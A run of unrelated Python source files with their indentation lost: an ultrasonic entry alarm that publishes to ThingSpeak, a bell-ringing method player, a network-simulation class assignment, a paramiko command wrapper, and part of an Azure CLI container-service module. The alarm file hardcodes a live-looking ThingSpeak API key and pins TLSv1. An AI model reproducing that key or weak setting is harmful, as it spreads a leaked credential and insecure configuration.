now_time = datetime.datetime.now().time()
if time_a < time_b:
return time_a <= now_time <= time_b
else:
return time_a <= now_time or now_time <= time_b
def whee_u_whee_u():
global buzzerActive, testColor
buzzerActive = (buzzerActive + 1) % 2
testColor = (testColor + 1) % 2
buzzer.write(buzzerActive)
led.write(testColor)
def entry():
global alarmActive
publish.single(topic, payload="field1=1", hostname=mqttHost, port=tPort, tls=tTLS, transport=tTransport)
logging.info("entry detected")
if is_bad_time():
logging.info("alarm triggered")
requests.get('http://raspi2:5000/trigger_alarm')
alarmActive = True
def exit():
publish.single(topic, payload="field2=1", hostname=mqttHost, port=tPort, tls=tTLS, transport=tTransport)
logging.info("exit detected")
def clear():
buzzer.write(0)
led.write(0)
def loop():
global last_ultrasonic_ranger_1, last_ultrasonic_ranger_2
try:
while True:
new_ultrasonic_ranger_1 = (ultrasonic_ranger_1.get_distance()) < 120
new_ultrasonic_ranger_2 = (ultrasonic_ranger_2.get_distance()) < 120
if last_ultrasonic_ranger_1 and new_ultrasonic_ranger_2 and not last_ultrasonic_ranger_2:
entry()
elif last_ultrasonic_ranger_2 and new_ultrasonic_ranger_1 and not last_ultrasonic_ranger_1:
exit()
last_ultrasonic_ranger_1 = new_ultrasonic_ranger_1
last_ultrasonic_ranger_2 = new_ultrasonic_ranger_2
if alarmActive:
whee_u_whee_u()
time.sleep(delay)
finally:
clear()
@app.route("/kill_alarm")
def kill_alarm():
global alarmActive
alarmActive = False
clear()
logging.info("alarm killed")
publish.single(topic, payload="field3=1", hostname=mqttHost, port=tPort, tls=tTLS, transport=tTransport)
return "kill_alarm"
def setup_mqtt():
global topic, mqttHost, tPort, tTLS, tTransport
channelID = "931380"
apiKey = "PCLULCAKPMI6IU1J"
mqttHost = "mqtt.thingspeak.com"
import ssl
tTransport = "websockets"
tTLS = {'ca_certs': "/etc/ssl/certs/ca-certificates.crt", 'tls_version': ssl.PROTOCOL_TLSv1}
tPort = 443
topic = "channels/" + channelID + "/publish/" + apiKey
if __name__ == '__main__':
setup_mqtt()
logging.info('Started application')
thread = threading.Thread(target=loop)
thread.start()
app.run(host="0.0.0.0")
|
Methods.py
|
from threading import Thread
import socket
from time import sleep
from sys import byteorder
from Config import Config
import configparser
from Row import Row
import os
import sys
from random import randrange
def bell_indicators(MAX_BELLS,
INDICATE_BELL_NUMBER_SHIFT,
INDICATE_BELL_HANDSTROKE,
INDICATE_BELL_BACKSTROKE,
INDICATE_BELL_GRAPHIC_SHOW,
INDICATE_BELL_GRAPHIC_CLEAR):
hand = {}
back = {}
graphic_show = {}
graphic_clear = {}
for ndx in range(MAX_BELLS):
hand[ndx] = INDICATE_BELL_HANDSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)
back[ndx] = INDICATE_BELL_BACKSTROKE | (ndx << INDICATE_BELL_NUMBER_SHIFT)
graphic_show[ndx] = INDICATE_BELL_GRAPHIC_SHOW | (ndx << INDICATE_BELL_NUMBER_SHIFT)
graphic_clear[ndx] = INDICATE_BELL_GRAPHIC_CLEAR | (ndx << INDICATE_BELL_NUMBER_SHIFT)
return hand, back, graphic_show, graphic_clear
class Row():
def __init__(self, number_of_bells):
self.positions = [None for ndx in range(number_of_bells)]
self.call_go = False
self.call_thats_all = False
self.call_bob = False
self.call_single = False
self.call_stand = False
def __str__(self):
say = ''
if self.call_go:
say += 'Go Method '
if self.call_thats_all:
say += 'Thats All '
if self.call_bob:
say += 'Bob '
if self.call_single:
say += 'Single '
if self.call_stand:
say += 'Stand Next '
say += str(self.positions)
return say
class Extent():
LEAD_TYPE_PLAIN = 'P'
LEAD_TYPE_BOB = 'B'
LEAD_TYPE_SINGLE = 'S'
def __init__(self, method, extent_id, cover = True, intro_courses = 1, extent_courses = 1, wait_learner = False):
self.name = method.extent_name(extent_id)
self.length = method.extent_length(extent_id) * extent_courses
self.definition = method.extent_definition(extent_id)
self.wait = wait_learner
# If the extent is mutable it can be shift shuffled
# The sections that can be shifted are delimited by '-' characters so will be split, shifted and then stuck togather
if method.extent_mutable(extent_id):
# Remove all formatting spaces
self.definition = self.definition.replace(' ', '')
# Break into sections
sections = self.definition.split('-')
for ndx in range(len(sections)):
s = sections[ndx]
# Decide how many shifts to perform on the section
shifts = randrange(len(s))
for shift in range(shifts):
s = s[-1] + s[0:-1]
sections[ndx] = s
# Reassemble the sections
self.definition = ''.join(sections)
# The number of bells being rung is the number of bells in the method plus the optional cover
self.number_of_bells = method.number_of_bells()
self.cover = cover
if self.cover:
self.number_of_bells += 1
# A reference to the parent method is only needed for dumping to text
self.method = method
self.rows = []
# The last lead is 'plain' to force a plain start in the first lead
last_lead = Extent.LEAD_TYPE_PLAIN
for courses in range(extent_courses):
# Build the course
for lead in self.definition:
Extent._add_lead_start(last_lead, self.rows, method, self.length, cover)
if lead in ('p', 'P'):
Extent._add_plain(self.rows, method, self.length, cover)
last_lead = Extent.LEAD_TYPE_PLAIN
elif lead in ('b', 'B'):
Extent._add_bob(self.rows, method, self.length, cover)
last_lead = Extent.LEAD_TYPE_BOB
elif lead in ('s', 'S'):
Extent._add_single(self.rows, method, self.length, cover)
last_lead = Extent.LEAD_TYPE_SINGLE
# Add the intro rounds and the Go Method call to the last backstroke of the intro
intro = []
for ndx in range(intro_courses):
Extent._add_round(intro, self.number_of_bells)
intro[((intro_courses - 1) * 2) + 1].call_go = True
self.rows = intro + self.rows
# Add That's All to the second to last row of the extent
self.rows[len(self.rows) - 2].call_thats_all = True
# If the extent ended on a back stroke add the extra half round
if len(self.rows) % 2 != 0:
Extent._add_half_round(self.rows, self.number_of_bells)
# Add the final rounds and the call to Stand
Extent._add_round(self.rows, self.number_of_bells)
self.rows[len(self.rows) - 2].call_stand = True
def _add_half_round(rows, bells):
row = Row(bells)
for ndx in range(bells):
row.positions[ndx] = ndx + 1
rows.append(row)
def _add_round(rows, bells):
Extent._add_half_round(rows, bells)
Extent._add_half_round(rows, bells)
def _add_lead_start(last_lead, rows, method, length, cover):
if last_lead == Extent.LEAD_TYPE_PLAIN:
Extent._apply(rows, method.number_of_bells(), method.plain_start, length, cover)
elif last_lead == Extent.LEAD_TYPE_BOB:
Extent._apply(rows, method.number_of_bells(), method.bob_start, length, cover)
elif last_lead == Extent.LEAD_TYPE_SINGLE:
Extent._apply(rows, method.number_of_bells(), method.single_start, length, cover)
def _add_plain(rows, method, length, cover):
Extent._apply(rows, method.number_of_bells(), method.tracks, length, cover)
Extent._apply(rows, method.number_of_bells(), method.plain, length, cover)
def _add_bob(rows, method, length, cover):
Extent._apply(rows, method.number_of_bells(), method.tracks, length, cover)
# Call the Bob at the beginning of the last row BEFORE the Bob
rows[len(rows) - 1].call_bob = True
Extent._apply(rows, method.number_of_bells(), method.bob, length, cover)
def _add_single(rows, method, length, cover):
Extent._apply(rows, method.number_of_bells(), method.tracks, length, cover)
# Call the Single at the beginning of the last row BEFORE the Single
rows[len(rows) - 1].call_single = True
Extent._apply(rows, method.number_of_bells(), method.single, length, cover)
def _apply(rows, number_of_bells, work, length, cover):
prev = len(rows) - 1
bells = number_of_bells
if cover:
bells += 1
if len(work) > 0:
for ndx in range(len(work[0])):
if length > len(rows):
row = Row(bells)
if cover:
row.positions[bells -1] = bells
rows.append(row)
for track in range(number_of_bells):
if prev < 0:
bell = track + 1
else:
bell = rows[prev].positions[track]
curr = prev + 1
for t in work[track]:
if curr < length:
rows[curr].positions[t - 1] = bell
curr += 1
def to_mdf(self):
print('[INFO]')
print('name={} {}'.format(self.method.name, self.name))
print('bells={}'.format(self.method.number_of_bells()))
print('rows={}'.format(self.length))
print()
# For dump purposes 'assume' there are two intro and two extro rounds
print('[ROWS]')
row_id = 1
for ndx in range(self.length):
r = self.rows[ndx + 2]
print('M{:04}='.format(row_id,), end = '')
if r.call_bob:
print('(B) ', end = '')
if r.call_single:
print('(S) ', end = '')
for p in range(self.method.number_of_bells()):
print('{} '.format(r.positions[p]), end = '')
print()
row_id += 1
def dump(self):
row_id = -1
for r in self.rows:
print('M{:04}='.format(row_id,), end = '')
if r.call_bob:
print('(B) ', end = '')
if r.call_single:
print('(S) ', end = '')
for p in r.positions:
print('{} '.format(p), end = '')
print()
row_id += 1
class Method():
def __init__(self, file):
self.definition = configparser.ConfigParser()
self.definition.optionxform = str # Don't want keys to be lower cased
self.definition.read(file)
self.name = self.definition.get('INFO', 'name')
self.tracks = {}
for key in self.definition['TRACKS']:
self.tracks[int(key) - 1] = [int(v) for v in self.definition['TRACKS'][key].split()]
# Just in case a method is added where the Bobs and singles have an
# effect across the end of a lead and into the start of the next lead. To account for
# this the concept of the start of a lead being different depending on the previous
# lead was introduced. The PLAIN_START, BOB_START and SINGLE_START sections of the
# definition files are optional as they are not necessary for most mothods
self.plain_start = {}
if self.definition.has_section('PLAIN_START'):
for key in self.definition['PLAIN_START']:
self.plain_start[int(key) - 1] = [int(v) for v in self.definition['PLAIN_START'][key].split()]
self.plain = {}
if self.definition.has_section('PLAIN'):
for key in self.definition['PLAIN']:
self.plain[int(key) - 1] = [int(v) for v in self.definition['PLAIN'][key].split()]
self.bob_start = {}
if self.definition.has_section('BOB_START'):
for key in self.definition['BOB_START']:
self.bob_start[int(key) - 1] = [int(v) for v in self.definition['BOB_START'][key].split()]
self.bob = {}
if self.definition.has_section('BOB'):
for key in self.definition['BOB']:
self.bob[int(key) - 1] = [int(v) for v in self.definition['BOB'][key].split()]
self.single_start = {}
if self.definition.has_section('SINGLE_START'):
for key in self.definition['SINGLE_START']:
self.single_start[int(key) - 1] = [int(v) for v in self.definition['SINGLE_START'][key].split()]
self.single = {}
if self.definition.has_section('SINGLE'):
for key in self.definition['SINGLE']:
self.single[int(key) - 1] = [int(v) for v in self.definition['SINGLE'][key].split()]
def name(self):
return self.name
def extent_exists(self, extent_id):
key = 'EXTENT-' + str(extent_id)
return key in self.definition
def number_of_bells(self):
return self.definition.getint('INFO', 'bells')
def coverable(self):
return self.definition.getboolean('INFO', 'coverable', fallback = False)
def extent_name(self, key):
return self.definition.get(key, 'NAME')
def extent_length(self, key):
return self.definition.getint(key, 'LENGTH')
def extent_size(self, key, cover, intros, courses):
bells = self.number_of_bells()
if self.coverable() and cover:
bells += 1
size = self.extent_length(key) * bells * courses
size += intros * bells * 2
size += bells * 2 # Always two extro rounds
return size
def extent_definition(self, key):
return self.definition.get(key, 'DEFINITION')
def extent_mutable(self, key):
return self.definition.getboolean(key, 'MUTABLE', fallback = False)
def methods(conn, ring_addr, ring_port):
app_path = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__)))
config = Config()
MAX_BELLS = config.getint('BELLS', 'bells')
GO = config.getint('STRIKE_COMMANDS', 'go')
THATS_ALL = config.getint('STRIKE_COMMANDS', 'thats_all')
BOB = config.getint('STRIKE_COMMANDS', 'bob')
SINGLE = config.getint('STRIKE_COMMANDS', 'single')
STAND = config.getint('STRIKE_COMMANDS', 'stand_next')
INDICATE_BELL_NUMBER_SHIFT = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_bell_number_shift')
INDICATE_BELL_HANDSTROKE = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_bell') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_BACKSTROKE = INDICATE_BELL_HANDSTROKE + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_stroke_shift'))
INDICATE_BELL_GRAPHIC_CLEAR = config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_graphic') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_type_shift')
INDICATE_BELL_GRAPHIC_SHOW = INDICATE_BELL_GRAPHIC_CLEAR + \
(config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_mask') << config.getint('GUI_EVENT_LISTENER_COMMANDS', 'indicate_graphic_shift'))
handstroke_indicators, backstroke_indicators, graphic_show_indicators, graphic_clear_indicators = bell_indicators(MAX_BELLS,
INDICATE_BELL_NUMBER_SHIFT,
INDICATE_BELL_HANDSTROKE,
INDICATE_BELL_BACKSTROKE,
INDICATE_BELL_GRAPHIC_SHOW,
INDICATE_BELL_GRAPHIC_CLEAR)
bells = [True] * MAX_BELLS
bells_rung = [False] * MAX_BELLS
stop_playing = False
method = None
extent = None
pace = 3.0
pause = pace / MAX_BELLS
courses = 1
intro_rounds = 1
def play(ring_port):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ndx = 0
stroke_type = "B"
LOOK_TO = config.getint('STRIKE_COMMANDS', 'look_to')
sock.sendto(LOOK_TO.to_bytes(1, byteorder), (ring_addr, ring_port))
sleep(4)
for row in extent.rows:
if stop_playing:
break
if row.call_go:
sock.sendto(GO.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_thats_all:
sock.sendto(THATS_ALL.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_bob:
sock.sendto(BOB.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_single:
sock.sendto(SINGLE.to_bytes(1, byteorder), (ring_addr, ring_port))
if row.call_stand:
sock.sendto(STAND.to_bytes(1, byteorder), (ring_addr, ring_port))
stroke_type = "H" if stroke_type == "B" else "B"
for strike in row.positions:
if stop_playing:
break
sock.sendto(graphic_show_indicators[strike - 1].to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
sleep(pause / 2.0)
if stroke_type == 'H':
indicator = backstroke_indicators[strike - 1]
else:
indicator = handstroke_indicators[strike - 1]
sock.sendto(indicator.to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
if bells[strike - 1]:
sock.sendto(strike.to_bytes(1, byteorder), (ring_addr, ring_port))
else:
if extent.wait:
while not bells_rung[strike - 1] and not stop_playing:
sleep(0.01)
bells_rung[strike - 1] = False
sleep(pause / 2.0)
sock.sendto(graphic_clear_indicators[strike - 1].to_bytes(1, byteorder), (config.get('GUI_EVENT_LISTENER', 'addr',), config.getint('GUI_EVENT_LISTENER', 'port')))
if stroke_type == 'B':
# Hand stroke lead pause
sleep(pause)
t = None
while True:
command = conn.recv().split(",")
if command[0] == "Exit":
stop_playing = True
if t and t.is_alive():
t.join()
break
elif command[0] == "Start":
stop_playing = False
if method:
t = Thread(target = play, args = (ring_port,))
t.start()
elif command[0] == "Stop":
stop_playing = True
if t and t.is_alive():
t.join()
elif command[0] == 'Pace':
pace = float(command[1])
if extent:
pause = pace / extent.number_of_bells
else:
pause = pace / MAX_BELLS
elif command[0] == "Load":
method = Method(app_path + '/data/' + command[1] + '.mcf')
extent = Extent(method, extent_id = command[2], cover = (command[3] == 'cover'), intro_courses = int(command[4]), extent_courses = int(command[5]), wait_learner = (command[6] == 'True'))
# extent.dump()
extent.to_mdf()
pause = pace / extent.number_of_bells
elif command[0] == "Play":
bell = int(command[1])
bells[bell - 1] = command[2] == "True"
elif command[0] == "Rung":
bell = int(command[1])
bells_rung[bell - 1] = True
|
simulation_1.py
|
#Laura Sullivan-Russett and Grace Walkuski
#CSCI 466
#PA3
#November 2, 2018
import network_1
import link_1
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network_1.Host(1)
object_L.append(client)
server = network_1.Host(2)
object_L.append(server)
router_a = network_1.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link_1.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link_1.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_1.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data %d that is too long to deliver through the current MTU length of 50 characters.' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
command.py
|
import threading
from typing import Optional
from paramiko.channel import ChannelStdinFile, ChannelFile, ChannelStderrFile
class RemoteCommand:
"""
RemoteCommand wraps the IO pipes of a paramiko command. It is with-able and
uses threads to guarantee easy IO. Note that upon exit of the with-statement,
the RemoteCommand will be aborted if it has not already exit. Use the RemoteCommand.wait
function to wait for the command exit. Note that if you do not catch the TimeoutError
within the with-statement, the __exit__ call will cause an abortion of the command.
"""
def __init__(self, stdin: ChannelStdinFile, stdout: ChannelFile, stderr: ChannelStderrFile):
self.stdin = stdin
self._stdout = stdout
self._stderr = stderr
self._stdout_buff_lock = threading.Lock()
self._stdout_buff = ""
self._stderr_buff_lock = threading.Lock()
self._stderr_buff = ""
self._stdout_consumer_ready = threading.Event()
self._stderr_consumer_ready = threading.Event()
self._stdout_consumer = threading.Thread(target=self._consume_stdout)
self._stderr_consumer = threading.Thread(target=self._consume_stderr)
self._stdout_consumer.start()
self._stderr_consumer.start()
self._stdout_consumer_ready.wait()
self._stderr_consumer_ready.wait()
self._exit_code: Optional[int] = None
self._has_exit = threading.Event()
self._exit_listener = threading.Thread(target=self._wait)
self._exit_listener.start()
def _consume_stdout(self):
try:
self._stdout_consumer_ready.set()
while True:
line = self._stdout.readline()
if not line:
break
with self._stdout_buff_lock:
self._stdout_buff += line
except:
return
def _consume_stderr(self):
try:
self._stderr_consumer_ready.set()
while True:
line = self._stderr.readline()
if not line:
break
with self._stderr_buff_lock:
self._stderr_buff += line
except:
return
def _wait(self):
self._exit_code = self._stdout.channel.recv_exit_status()
self._has_exit.set()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
@property
def exit_code(self) -> Optional[int]:
"""
Returns the exit_code of the command or None if the command is still running.
In case of a failure or an aborted command, -1 will be returned as paramiko does via
recv_exit_status.
:return: Exit code of the command or None if the command is still running.
"""
if not self._has_exit.is_set():
return None
return self._exit_code
def wait(self, timeout: Optional[float] = None) -> int:
"""
Waits for the command to exit. Raises a TimeoutError if the timeout is reached
before the command has exit. The command will not be aborted automatically if this happens.
:param timeout: Timeout in (fractions of) seconds. Infinity if None.
:return: The exit code of the process.
"""
self._has_exit.wait(timeout)
if self.exit_code is None:
raise TimeoutError("waiting for command exit timed out")
return self.exit_code
@property
def stdout(self) -> str:
"""
Returns the asynchronously captured stdout.
:return: The captured stdout.
"""
with self._stdout_buff_lock:
return self._stdout_buff
@property
def stderr(self) -> str:
"""
Returns the asynchronously captured stderr.
:return:
"""
with self._stderr_buff_lock:
return self._stderr_buff
def close(self):
"""
Closes the command, aborting it if it has not exit yet.
"""
if not self.stdin.closed:
self.stdin.close()
self.stdin.channel.close()
if not self._stdout.closed:
self._stdout.close()
if not self._stderr.closed:
self._stderr.close()
self._stdout_consumer.join()
self._stderr_consumer.join()
self._exit_listener.join()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_03_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_03_01.models import AgentPool
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMasterPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMonitorProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAPIProperties
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._helpers import _populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
